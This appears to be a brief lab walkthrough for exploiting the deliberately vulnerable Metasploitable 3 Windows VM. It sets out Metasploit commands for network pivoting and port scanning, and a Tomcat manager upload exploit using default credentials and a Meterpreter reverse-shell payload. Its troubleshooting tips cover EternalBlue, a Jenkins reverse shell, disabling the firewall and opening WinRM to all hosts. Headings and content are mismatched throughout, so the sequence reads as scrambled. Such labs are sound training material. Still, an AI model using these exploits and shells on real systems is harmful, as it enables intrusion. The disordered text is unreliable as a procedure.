Metasploitable 3 Windows Walkthrough May 2026

Metasploitable 3 often has two network interfaces: NAT (internet) and Host-Only (192.168.56.x). You can pivot into the host-only network.

run autoroute -s 192.168.56.0/24
background
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.56.1-255
set PORTS 445
run

You might find your actual host machine. Do not scan without authorization.

use auxiliary/scanner/portscan/ack

Once you have a Meterpreter session:

# System info
sysinfo
getuid
nmap -sV -p- 192.168.1.100

Expected open ports:

| Component | Specification | |-----------|---------------| | Attacker | Kali Linux (VM) | | Target | Metasploitable 3 (Windows Server 2008 / 2012 VM) | | Network | Host-Only / NAT (both VMs on same isolated network) | | Tools | Metasploit, Nmap, smbclient, enum4linux, winexe |

Important:

msf6 > use exploit/multi/http/tomcat_mgr_upload
msf6 > set RHOSTS 192.168.1.100
msf6 > set RPORT 8080
msf6 > set HttpUsername tomcat
msf6 > set HttpPassword tomcat
msf6 > set PAYLOAD java/meterpreter/reverse_tcp
msf6 > exploit

| Problem | Solution | |---------|----------| | EternalBlue fails | Use auxiliary/scanner/smb/smb_ms17_010 first. Target may need reboot. | | WinRM access denied | Ensure winrm quickconfig and Set-Item WSMan:\localhost\Client\TrustedHosts -Value "*" on target. | | Jenkins reverse shell no connection | Check Windows firewall – disable it or allow inbound port. | | Vagrant VM not starting | Increase RAM to 4GB, enable VT-x in BIOS. |